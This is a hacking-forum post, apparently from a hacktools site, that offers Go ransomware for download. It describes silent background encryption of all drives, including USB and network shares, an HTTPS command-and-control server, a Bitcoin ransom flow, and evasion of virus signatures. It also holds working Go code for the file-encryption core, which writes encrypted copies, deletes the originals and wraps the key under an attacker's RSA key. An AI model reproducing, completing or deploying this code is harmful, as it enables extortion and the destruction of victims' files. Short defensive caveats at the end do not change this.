
Ransomware | Written In GO | Aes | Rsa | Https

Diabl0
Basically, it will encrypt your files in the background using AES-256-CTR, a strong encryption algorithm, using RSA-4096 to secure the key exchange with the server. Yeah, a CryptoLocker-like malware.

It is composed of two main parts, the server and the malware itself.

The server is responsible for storing the ID and the respective encryption key, and will possibly act as a Command and Control server in the near future.

The malware encrypts the keys with an RSA-4096 public key before sending them to the server. This approach, together with the HTTPS transport, makes the security and authentication almost unbreakable (in theory).


Features

  • Run in background (or not)
  • Encrypts files using AES-256-CTR (counter mode) with a random IV for each file
  • Without a virus signature (at the moment)
  • Uses RSA-4096 to secure the authenticity
  • HTTPS and HTTP/2 transport by default
  • Stream encryption to avoid loading an entire file into memory
  • Walks all drives by default, including USB drives and network locations
  • Lock registry entry with a hash digest (maybe SHA-256) to identify an infected victim
  • Tor or another approach to hide the connection with the C&C (see issue 3)
  • Docker image for compilation


How it Works:

The malware will run in the background. You can see what is going on by commenting out the HIDDEN line in the Makefile before building.

By default, the server will listen on (link hidden). The client will use this host as the default URL too.

You can put the server on any domain and start it. Simply overwrite SERVER_HOST and SERVER_PORT in the Makefile before building and the malware will try to connect to this URL instead.

After the build, binaries called ransomware.exe, server/server.exe and unlocker.exe will be generated in the bin folder. The execution of ransomware.exe and unlocker.exe (even if compiled for linux/darwin) is locked to Windows machines only.

Feel free to edit the parameters across the files for testing. The most important parameters are defined in cmd/common.go and the Makefile.

Put the binaries in a proper Windows test environment and start the server. It will wait for the malware to make contact and persist the ID/encryption keys.

When you double-click ransomware.exe it will run in the background by default, walking the interesting directories and encrypting all files that match the interesting file extensions using AES-256-CTR and a random IV for each file, recreating them with encrypted content and a custom extension (.encrypted by default), and creating READ_TO_DECRYPT.html and FILES_ENCRYPTED.html files on the desktop.

In theory, to decrypt your files you need to send an amount of BTC to the attacker's wallet, followed by a contact sending your ID (located in the file created on the desktop). If your payment is confirmed, the attacker possibly (or maybe not) will return your encryption key and the unlocker.exe, and you can use them to recover your files. This exchange can be accomplished in several ways and WILL NOT be implemented in this project for obvious reasons.

Let's suppose you get your encryption key back; you can retrieve it by pointing to the following URL:

curl -k (link hidden)

Where :id is your identification stored in the file on the desktop. Afterwards, run unlocker.exe by double-clicking it and follow the instructions.





Download:

Link: https://github.com/mauri870/ransomware




If you'd like to build the server for Windows from a Unix machine, run env GOOS=windows make.

DON'T RUN ransomware.exe IN YOUR PERSONAL MACHINE, EXECUTE ONLY IN A TEST ENVIRONMENT!

Download:

(link hidden)

Password:

level23hacktools.com
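The scheme the post describes (one random AES-256 key per victim, sealed under the attacker's RSA-4096 public key before it leaves the machine; a fresh random IV for every file; CTR applied as a stream so a file is never loaded whole into memory; the original replaced by a copy carrying a .encrypted extension), written out as an added Go example. This is not code from the mauri870/ransomware project or from the poster: the IV-as-header file layout, RSA-OAEP with SHA-256 as the wrapping mode, and the names EncryptStream, DecryptStream, EncryptFile, NewAttackerKey, WrapKey and UnwrapKey are assumptions of this example, not details the post gives. The sample file it encrypts is constructed in a temporary directory.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"fmt"
	"io"
	"os"
	"path/filepath"
)

// EncryptStream writes iv || AES-256-CTR(src) to dst without holding the file in memory.
// Added example, not the project's code: the IV-as-header layout and every name here are
// assumptions; the post fixes only the algorithm, the random IV per file and the key sizes.
func EncryptStream(key []byte, dst io.Writer, src io.Reader) error {
	block, err := aes.NewCipher(key) // a 32-byte key selects AES-256
	if err != nil {
		return err
	}
	iv := make([]byte, aes.BlockSize) // fresh per file: reusing an IV under one key breaks CTR
	if _, err := io.ReadFull(rand.Reader, iv); err != nil {
		return err
	}
	if _, err := dst.Write(iv); err != nil {
		return err
	}
	_, err = io.Copy(&cipher.StreamWriter{S: cipher.NewCTR(block, iv), W: dst}, src)
	return err
}

// DecryptStream (the unlocker side) reads the IV header back and streams plaintext to dst.
func DecryptStream(key []byte, dst io.Writer, src io.Reader) error {
	block, err := aes.NewCipher(key)
	if err != nil {
		return err
	}
	iv := make([]byte, aes.BlockSize)
	if _, err := io.ReadFull(src, iv); err != nil {
		return err
	}
	_, err = io.Copy(dst, &cipher.StreamReader{S: cipher.NewCTR(block, iv), R: src})
	return err
}

// EncryptFile replaces path with path+suffix holding the ciphertext, the way the post
// describes files being recreated with a .encrypted extension.
func EncryptFile(path string, key []byte, suffix string) error {
	in, err := os.Open(path)
	if err != nil {
		return err
	}
	out, err := os.Create(path + suffix)
	if err != nil {
		in.Close()
		return err
	}
	err = EncryptStream(key, out, in)
	in.Close() // close before Remove: Windows refuses to delete an open file
	if cerr := out.Close(); err == nil {
		err = cerr // the ciphertext must be fully flushed before the original goes away
	}
	if err != nil {
		return err
	}
	return os.Remove(path)
}

// NewAttackerKey generates the RSA pair whose public half ships inside the malware.
func NewAttackerKey(bits int) (*rsa.PrivateKey, error) {
	return rsa.GenerateKey(rand.Reader, bits)
}

// WrapKey seals the per-victim AES key under that public key before it leaves the machine
// (RSA-OAEP with SHA-256 assumed); UnwrapKey is what the server side does with the private key.
func WrapKey(pub *rsa.PublicKey, key []byte) ([]byte, error) {
	return rsa.EncryptOAEP(sha256.New(), rand.Reader, pub, key, nil)
}

func UnwrapKey(priv *rsa.PrivateKey, wrapped []byte) ([]byte, error) {
	return rsa.DecryptOAEP(sha256.New(), rand.Reader, priv, wrapped, nil)
}

func main() {
	priv, _ := NewAttackerKey(4096) // the post's key size
	key := make([]byte, 32)
	rand.Read(key)
	wrapped, _ := WrapKey(&priv.PublicKey, key) // this, not the raw key, is what would be sent
	dir, _ := os.MkdirTemp("", "demo")          // constructed sample, not a real target
	target := filepath.Join(dir, "notes.txt")
	os.WriteFile(target, []byte("sample document"), 0o600)
	err := EncryptFile(target, key, ".encrypted")
	fmt.Println(len(wrapped), err) // 512-byte wrapped key for RSA-4096, err <nil>
	os.RemoveAll(dir)
}
```

Two caveats a practitioner should keep in mind when reading the post's "almost unbreakable" claim against this shape of design: CTR gives confidentiality only, so a modified .encrypted file decrypts to garbage without any error from the unlocker, and the raw AES key has to exist in the process's memory on the victim before it is wrapped, which is exactly where a memory capture taken while encryption is running would recover it.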
 
Re: Ransomware | Written In GO | Aes| Rsa | Https

thanks for this

 
Re: Ransomware | Written In GO | Aes| Rsa | Https

thanks for this

 